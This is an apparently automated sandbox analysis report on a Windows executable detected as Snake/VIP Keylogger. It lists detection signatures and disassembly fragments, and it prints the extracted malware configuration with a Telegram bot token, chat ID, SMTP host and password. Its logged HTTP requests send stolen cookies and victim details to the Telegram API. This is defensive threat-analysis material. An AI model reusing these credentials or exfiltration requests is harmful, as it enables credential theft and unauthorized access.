Windows Analysis Report
SKM_72059114803.exe

Overview

General Information

Sample name: SKM_72059114803.exe
Analysis ID: 1651012
MD5: c8373c2f6080a66874573a1db7f5150d
SHA1: 1efd5e682d5d787cacb856931aed19f98356f336
SHA256: d4206a632d73c444c57805f6ca14ced0c75f05e5bd6928c289014e0ebb6d5a56
Tags: exeuser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8", "Chat id": "1443320838", "Email ID": "hectronica@hectronica.com", "Password": "23Ku_e91y", "Host": "mail.hectronica.com", "Port": "587"}
Source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "hectronica@hectronica.com", "Password": "23Ku_e91y", "Host": "mail.hectronica.com", "Port": "587", "Token": "7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8", "Chat_id": "1443320838", "Version": "4.4"}
Source: InstallUtil.exe.6420.2.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\InnerException.exe ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: SKM_72059114803.exe Virustotal: Detection: 69% Perma Link
Source: SKM_72059114803.exe ReversingLabs: Detection: 75%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 100.0%
Sample uses string decryption to hide its real strings
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: hectronica@hectronica.com
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: 23Ku_e91y
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: mail.hectronica.com
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: triihope931@gmail.com
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: 587
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: 7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor: 1443320838
Source: 5.2.InstallUtil.exe.2220dee.0.raw.unpack String decryptor:

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: SKM_72059114803.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49682 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49700 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: SKM_72059114803.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SKM_72059114803.exe, 00000000.00000002.1074573465.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.1213174586.0000000003550000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: _.pdb source: InstallUtil.exe, 00000002.00000002.3510366185.0000000003288000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SKM_72059114803.exe, 00000000.00000002.1074573465.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.1213174586.0000000003550000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SKM_72059114803.exe, 00000000.00000002.1074382230.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.1213174586.0000000003441000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SKM_72059114803.exe, 00000000.00000002.1074382230.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.1213174586.0000000003441000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_05C4D880
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D609E9h 0_2_05D607D8
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D609E9h 0_2_05D607E8
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D631B1h 0_2_05D63174
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D60447h 0_2_05D60040
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D60447h 0_2_05D60007
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D631B1h 0_2_05D62E30
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D631B1h 0_2_05D62E21
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D97FC8h 0_2_05D97F10
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D97FC8h 0_2_05D97EDB
Source: C:\Users\user\Desktop\SKM_72059114803.exe Code function: 4x nop then jmp 05D97FC8h 0_2_05D97E7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 030CF718h 2_2_030CF767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 030CF718h 2_2_030CF578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E8320h 2_2_062E7FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E96F3h 2_2_062E9420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EE88Ah 2_2_062EE5B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062ECCFAh 2_2_062ECA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EACD2h 2_2_062EAA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E1CFCh 2_2_062E1A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EED22h 2_2_062EEA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E2154h 2_2_062E1EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E4D2Ch 2_2_062E4A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E712Ch 2_2_062E6E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EB16Ah 2_2_062EAE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EF1BAh 2_2_062EEEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062ED192h 2_2_062ECEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E5184h 2_2_062E4ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E7584h 2_2_062E72D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E55DCh 2_2_062E5330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E79DCh 2_2_062E7730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EB602h 2_2_062EB330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E25ACh 2_2_062E2300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E2A04h 2_2_062E2758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062ED62Ah 2_2_062ED358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E2E5Ch 2_2_062E2BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E5A34h 2_2_062E5788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E7E34h 2_2_062E7B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EF652h 2_2_062EF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E5E8Ch 2_2_062E5BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EDAC2h 2_2_062ED7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EBA9Ah 2_2_062EB7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E62E4h 2_2_062E6038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E9F0Ah 2_2_062E9C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E32B4h 2_2_062E3008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EFAEAh 2_2_062EF818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E370Ch 2_2_062E3460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EBF32h 2_2_062EBC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E02ECh 2_2_062E0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E3B64h 2_2_062E38B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EDF5Ah 2_2_062EDC88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E0744h 2_2_062E0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E673Ch 2_2_062E6490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E6B96h 2_2_062E68E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EC3CAh 2_2_062EC0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E0B9Ch 2_2_062E08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EA3A2h 2_2_062EA0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EE3F2h 2_2_062EE120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EA83Ah 2_2_062EA568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E0FF4h 2_2_062E0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E144Ch 2_2_062E11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062EC862h 2_2_062EC590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 062E18A4h 2_2_062E15F8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_057AD880
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C09E9h 4_2_059C07D8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C09E9h 4_2_059C07E8
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C31B1h 4_2_059C3174
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C0447h 4_2_059C0006
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C0447h 4_2_059C0040
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C31B1h 4_2_059C2E30
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 059C31B1h 4_2_059C2E21
Source: C:\Users\user\AppData\Roaming\InnerException.exe Code function: 4x nop then jmp 05AB6248h 4_2_05AB6190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 022EF9C0h 5_2_022EFA0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 022EF9C0h 5_2_022EFA81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 022EF9C0h 5_2_022EF820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5E1FCh 5_2_05F5DF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F53326h 5_2_05F52F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F52D5Ch 5_2_05F52AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5D09Ch 5_2_05F5CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5FC0Ch 5_2_05F5F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5F7B4h 5_2_05F5F508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5F35Ch 5_2_05F5F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_05F50856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5EF04h 5_2_05F5EC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_05F50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5EAACh 5_2_05F5E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5E654h 5_2_05F5E3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F50D10h 5_2_05F50B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F516FBh 5_2_05F50B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F53326h 5_2_05F52F02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5DDA4h 5_2_05F5DAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5D94Ch 5_2_05F5D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_05F50676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F53326h 5_2_05F53254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05F5D4F4h 5_2_05F5D248

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49718 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49698 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49728 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49730 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49703 -> 194.164.173.199:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:134349%0D%0ADate%20and%20Time:%2028/03/2025%20/%2012:50:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20134349%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8/sendDocument?chat_id=1443320838&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6e5279ae1ec9Host: api.telegram.orgContent-Length: 741Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:134349%0D%0ADate%20and%20Time:%2028/03/2025%20/%2013:10:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20134349%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8/sendDocument?chat_id=1443320838&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6e4cbcbe1ca5Host: api.telegram.orgContent-Length: 741Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: KCOM-SPNService-ProviderNetworkex-MistralGB KCOM-SPNService-ProviderNetworkex-MistralGB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49708 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49714 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49705 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49684 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49681 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49699 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49683 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49697 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49704 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49707 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49689 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49725 -> 104.21.96.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49693 -> 104.21.96.1:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.10:49703 -> 194.164.173.199:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
